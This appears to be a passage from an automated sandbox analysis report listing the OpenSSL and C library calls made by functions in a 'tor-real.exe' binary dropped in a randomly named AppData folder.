                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09C260 memset,__stack_chk_fail,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,COMP_expand_block,CRYPTO_malloc,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,strncmp,strncmp,strncmp,__stack_chk_fail,25_2_6C09C260
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C092263 CRYPTO_zalloc,25_2_6C092263
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC279 EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,25_2_6C0CC279
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA286 COMP_get_type,CRYPTO_mem_ctrl,CRYPTO_malloc,CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,ERR_put_error,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,25_2_6C0AA286
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4297 HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,25_2_6C0E4297
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA2A0 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,__stack_chk_fail,25_2_6C0DA2A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0EA2B1 BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,25_2_6C0EA2B1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A02C0 CRYPTO_clear_free,25_2_6C0A02C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D22D0 CRYPTO_malloc,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0D22D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B22F9 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0B22F9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC30C EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,25_2_6C0CC30C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E0328 CRYPTO_free,CRYPTO_memdup,25_2_6C0E0328
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2321 CRYPTO_malloc,ERR_put_error,CRYPTO_free,25_2_6C0D2321
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C6349 CRYPTO_free,CRYPTO_memdup,25_2_6C0C6349
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B234C CRYPTO_memdup,CRYPTO_free,25_2_6C0B234C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096340 CRYPTO_malloc,CRYPTO_free,ERR_put_error,25_2_6C096340
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA358 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,25_2_6C0AA358
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE353 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0AE353
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0963AC CRYPTO_free,25_2_6C0963AC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B23A7 CRYPTO_free,25_2_6C0B23A7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0923D3 CRYPTO_free,25_2_6C0923D3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C63E4 CRYPTO_free,CRYPTO_memdup,25_2_6C0C63E4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E03FC CRYPTO_memdup,25_2_6C0E03FC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA3F7 ERR_put_error,CRYPTO_mem_ctrl,25_2_6C0AA3F7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9C21 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D9C21
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CFC31 CRYPTO_free,25_2_6C0CFC31
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5C40 CRYPTO_realloc,25_2_6C0C5C40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5C87 CRYPTO_realloc,25_2_6C0C5C87
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BBC90 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,__stack_chk_fail,memcpy,25_2_6C0BBC90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BFCB7 CRYPTO_free,25_2_6C0BFCB7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3CCB CRYPTO_malloc,ERR_put_error,CRYPTO_free,25_2_6C0D3CCB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09FCC5 EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_clear_free,CRYPTO_malloc,EVP_MD_CTX_new,EVP_MD_CTX_new,EVP_MD_CTX_set_flags,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,__stack_chk_fail,25_2_6C09FCC5
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3CD7 CRYPTO_free,CRYPTO_malloc,memcpy,25_2_6C0C3CD7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E3CE0 EVP_CIPHER_CTX_free,HMAC_CTX_free,HMAC_CTX_new,EVP_CIPHER_CTX_new,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,CRYPTO_free,__stack_chk_fail,CRYPTO_free,memcpy,ERR_clear_error,25_2_6C0E3CE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09FD1B EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_clear_free,CRYPTO_malloc,EVP_MD_CTX_new,EVP_MD_CTX_new,EVP_MD_CTX_set_flags,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_MD_CTX_free,25_2_6C09FD1B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A7D20 CRYPTO_zalloc,CRYPTO_free,ERR_put_error,25_2_6C0A7D20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3D39 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D3D39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9D3B BN_copy,BN_copy,BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,BN_dup,BN_dup,BN_dup,BN_free,BN_free,BN_free,BN_free,25_2_6C0E9D3B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BBD44 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,25_2_6C0BBD44
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DFD59 OPENSSL_sk_push,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,25_2_6C0DFD59
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9D51 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D9D51
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C7D66 memcpy,EVP_MD_size,time,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,__stack_chk_fail,OPENSSL_cleanse,OPENSSL_cleanse,25_2_6C0C7D66
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D1D95 CRYPTO_free,CRYPTO_free,__stack_chk_fail,25_2_6C0D1D95
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3DCC CRYPTO_malloc,memcpy,25_2_6C0C3DCC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CDDE0 memcmp,CRYPTO_free,memcmp,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,memcmp,CRYPTO_free,CRYPTO_free,__stack_chk_fail,25_2_6C0CDDE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E3DE3 HMAC_CTX_new,EVP_CIPHER_CTX_new,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0E3DE3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3DE4 CRYPTO_clear_free,EVP_PKEY_CTX_free,25_2_6C0A3DE4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DDDF7 CRYPTO_free,CRYPTO_free,25_2_6C0DDDF7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A7E03 CRYPTO_free,25_2_6C0A7E03
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3E07 CRYPTO_clear_free,EVP_PKEY_CTX_free,25_2_6C0A3E07
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5E10 OPENSSL_sk_num,X509_STORE_CTX_new,OPENSSL_sk_value,X509_STORE_CTX_init,X509_STORE_CTX_get0_param,X509_VERIFY_PARAM_set_auth_level,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,ERR_put_error,ERR_put_error,X509_STORE_CTX_free,X509_verify_cert,ERR_put_error,25_2_6C0A5E10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A7E11 CRYPTO_zalloc,CRYPTO_free,25_2_6C0A7E11
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DBE26 OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C0DBE26
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3E37 CRYPTO_clear_free,EVP_PKEY_CTX_free,25_2_6C0A3E37
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A1E4B CRYPTO_free,strlen,CRYPTO_strdup,ERR_put_error,ERR_put_error,25_2_6C0A1E4B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BBE54 CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,25_2_6C0BBE54
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CBE68 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,25_2_6C0CBE68
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3E7B CRYPTO_clear_free,EVP_PKEY_CTX_free,25_2_6C0A3E7B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9E93 CRYPTO_free,CRYPTO_strdup,BN_dup,25_2_6C0E9E93
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9EAB BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,25_2_6C0E9EAB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3EC6 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,memcmp,25_2_6C0C3EC6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9EC3 BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_dup,25_2_6C0E9EC3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9EDB BN_copy,BN_copy,BN_copy,CRYPTO_free,CRYPTO_strdup,BN_free,25_2_6C0E9EDB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5EE2 strlen,memchr,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_memcmp,25_2_6C0C5EE2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D1F19 CRYPTO_free,25_2_6C0D1F19
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A1F32 ERR_put_error,CRYPTO_free,CRYPTO_strdup,25_2_6C0A1F32
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E9F60 SRP_Verify_A_mod_N,SRP_Calc_u,SRP_Calc_server_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,25_2_6C0E9F60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3F94 CRYPTO_free,CRYPTO_malloc,25_2_6C0C3F94
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A1FA4 CRYPTO_free,CRYPTO_memdup,25_2_6C0A1FA4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C3819 CRYPTO_strdup,25_2_6C0C3819
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09D817 EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,25_2_6C09D817
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E1829 CRYPTO_malloc,memcpy,memcmp,memcmp,memcmp,CRYPTO_clear_free,25_2_6C0E1829
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5837 CRYPTO_free,CRYPTO_free,25_2_6C0C5837
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5846 CRYPTO_free,25_2_6C0E5846
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9856 OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,25_2_6C0A9856
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B5855 strlen,CRYPTO_free,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C0B5855
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C091868 BIO_get_data,BIO_get_shutdown,CRYPTO_free,BIO_get_init,BIO_clear_flags,BIO_set_init,25_2_6C091868
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB860 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,25_2_6C0BB860
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9879 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D9879
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB8AC OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C0DB8AC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C58C7 CRYPTO_realloc,25_2_6C0C58C7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0918C6 CRYPTO_free,BIO_get_init,BIO_clear_flags,BIO_set_init,25_2_6C0918C6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C38D7 CRYPTO_free,CRYPTO_malloc,memcpy,25_2_6C0C38D7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DD8E8 CRYPTO_free,CRYPTO_free,25_2_6C0DD8E8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF8E0 CRYPTO_zalloc,CRYPTO_free,__stack_chk_fail,25_2_6C0BF8E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A98F9 CRYPTO_free,CRYPTO_free,25_2_6C0A98F9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0958F0 CRYPTO_free,25_2_6C0958F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D993B EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D993B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095930 CRYPTO_malloc,ERR_put_error,25_2_6C095930
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB957 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,25_2_6C0DB957
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9984 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,25_2_6C0A9984
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9983 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D9983
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5998 CRYPTO_free,CRYPTO_free,25_2_6C0C5998
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0959B0 CRYPTO_free,25_2_6C0959B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0919D3 BIO_get_data,BIO_get_shutdown,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,BIO_get_init,BIO_clear_flags,BIO_set_init,ERR_put_error,25_2_6C0919D3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0959E0 CRYPTO_zalloc,ERR_put_error,25_2_6C0959E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D99E1 EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,25_2_6C0D99E1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C59F0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,CRYPTO_free,CRYPTO_free,CRYPTO_realloc,25_2_6C0C59F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CFA11 CRYPTO_free,time,CRYPTO_free,CRYPTO_malloc,memcpy,25_2_6C0CFA11
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9A39 CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,25_2_6C0A9A39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BDA30 CRYPTO_free,CRYPTO_memdup,25_2_6C0BDA30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E1A44 CRYPTO_clear_free,ERR_put_error,25_2_6C0E1A44
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BFA58 CRYPTO_free,25_2_6C0BFA58
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095A50 CRYPTO_free,25_2_6C095A50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09DA77 CRYPTO_malloc,25_2_6C09DA77
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5A87 CRYPTO_free,CRYPTO_free,25_2_6C0C5A87
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DFAA2 OPENSSL_sk_new_null,d2i_X509,OPENSSL_sk_push,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_memcmp,OPENSSL_sk_num,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,OPENSSL_sk_value,X509_get0_pubkey,CRYPTO_free,__stack_chk_fail,25_2_6C0DFAA2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9AB1 CRYPTO_free,25_2_6C0A9AB1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C7AD1 CRYPTO_free,__stack_chk_fail,25_2_6C0C7AD1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CFAE9 EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,25_2_6C0CFAE9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5B17 CRYPTO_realloc,25_2_6C0C5B17
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DBB16 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C0DBB16
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3B2C CRYPTO_malloc,memcpy,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,25_2_6C0D3B2C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3B69 CRYPTO_malloc,memcpy,25_2_6C0D3B69
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9BA7 CRYPTO_free,25_2_6C0D9BA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C7BB7 CRYPTO_free,25_2_6C0C7BB7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BFBB6 CRYPTO_zalloc,CRYPTO_free,25_2_6C0BFBB6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ADBC0 CRYPTO_free,BUF_MEM_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,ERR_put_error,ERR_put_error,25_2_6C0ADBC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A3BC0 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free,__stack_chk_fail,25_2_6C0A3BC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C5BEC CRYPTO_free,CRYPTO_free,25_2_6C0C5BEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BFBEC CRYPTO_free,25_2_6C0BFBEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AD420 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,ENGINE_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0AD420
